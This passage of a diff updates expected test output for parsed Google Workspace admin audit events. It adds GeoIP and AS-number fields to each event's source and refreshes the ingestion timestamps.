"source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2732,7 +3248,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915963600Z", + "ingested": "2021-12-14T14:44:24.297933488Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_TRUSTED_DOMAINS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "REMOVE_TRUSTED_DOMAINS", @@ -2787,6 +3303,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2796,7 +3324,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915968700Z", + "ingested": "2021-12-14T14:44:24.297933832Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EDU_TYPE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_EDU_TYPE", @@ -2851,6 +3379,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2860,7 +3400,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915974600Z", + "ingested": "2021-12-14T14:44:24.297934163Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_ENABLE_OAUTH_CONSUMER_KEY", @@ -2916,6 +3456,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2925,7 +3477,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915980300Z", + "ingested": "2021-12-14T14:44:24.297934570Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSO_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_SSO_ENABLED", @@ -2981,6 +3533,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2990,7 +3554,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915986300Z", + "ingested": "2021-12-14T14:44:24.297934914Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_SSL", @@ -3044,6 +3608,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3053,7 +3629,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915992Z", + "ingested": "2021-12-14T14:44:24.297935244Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}", "provider": "admin", "action": "CHANGE_EU_REPRESENTATIVE_CONTACT_INFO", @@ -3103,6 +3679,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3112,7 +3700,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916015800Z", + "ingested": "2021-12-14T14:44:24.297935575Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_TRANSFER_TOKEN\"}}", "provider": "admin", "action": "GENERATE_TRANSFER_TOKEN", @@ -3167,6 +3755,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3176,7 +3776,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916021100Z", + "ingested": "2021-12-14T14:44:24.297935901Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BACKGROUND_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_LOGIN_BACKGROUND_COLOR", @@ -3231,6 +3831,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3240,7 +3852,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916024800Z", + "ingested": "2021-12-14T14:44:24.297936405Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BORDER_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_LOGIN_BORDER_COLOR", @@ -3295,6 +3907,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3304,7 +3928,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916029400Z", + "ingested": "2021-12-14T14:44:24.297936733Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_ACTIVITY_TRACE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_LOGIN_ACTIVITY_TRACE", @@ -3359,6 +3983,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3368,7 +4004,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916035400Z", + "ingested": "2021-12-14T14:44:24.297937064Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_ENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"},{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", "provider": "admin", "action": "PLAY_FOR_WORK_ENROLL", @@ -3423,6 +4059,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3432,7 +4080,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916041800Z", + "ingested": "2021-12-14T14:44:24.297937409Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_UNENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"}]}}", "provider": "admin", "action": "PLAY_FOR_WORK_UNENROLL", @@ -3487,6 +4135,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3496,7 +4156,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916047Z", + "ingested": "2021-12-14T14:44:24.297937814Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"MX_RECORD_VERIFICATION_CLAIM\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MX_RECORD_VERIFICATION_CLAIM", @@ -3551,6 +4211,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3560,7 +4232,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916050900Z", + "ingested": "2021-12-14T14:44:24.297938151Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_NEW_APP_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_NEW_APP_FEATURES", @@ -3616,6 +4288,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3625,7 +4309,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916055700Z", + "ingested": "2021-12-14T14:44:24.297938500Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_USE_NEXT_GEN_CONTROL_PANEL", @@ -3681,6 +4365,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3690,7 +4386,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916061200Z", + "ingested": "2021-12-14T14:44:24.297938834Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPLOAD_OAUTH_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "UPLOAD_OAUTH_CERTIFICATE", @@ -3745,6 +4441,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3754,7 +4462,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916066300Z", + "ingested": "2021-12-14T14:44:24.297939167Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REGENERATE_OAUTH_CONSUMER_SECRET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "REGENERATE_OAUTH_CONSUMER_SECRET", @@ -3809,6 +4517,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3818,7 +4538,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916070300Z", + "ingested": "2021-12-14T14:44:24.297939798Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OPEN_ID_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_OPEN_ID_ENABLED", @@ -3874,6 +4594,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3883,7 +4615,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916075100Z", + "ingested": "2021-12-14T14:44:24.297940126Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ORGANIZATION_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_ORGANIZATION_NAME", @@ -3938,6 +4670,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3947,7 +4691,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916078800Z", + "ingested": "2021-12-14T14:44:24.297940455Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OUTBOUND_RELAY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "TOGGLE_OUTBOUND_RELAY", @@ -4003,6 +4747,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4012,7 +4768,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916083500Z", + "ingested": "2021-12-14T14:44:24.297940785Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MAX_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_MAX_LENGTH", @@ -4067,6 +4823,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4076,7 +4844,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916087900Z", + "ingested": "2021-12-14T14:44:24.297941112Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MIN_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_MIN_LENGTH", @@ -4131,6 +4899,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4140,7 +4920,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916092400Z", + "ingested": "2021-12-14T14:44:24.297941764Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL", @@ -4195,6 +4975,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4204,7 +4996,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916096300Z", + "ingested": "2021-12-14T14:44:24.297942095Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS", @@ -4260,6 +5052,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4269,7 +5073,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916101200Z", + "ingested": "2021-12-14T14:44:24.297942426Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "REMOVE_APPLICATION", @@ -4324,6 +5128,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4333,7 +5149,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916105800Z", + "ingested": "2021-12-14T14:44:24.297943386Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": 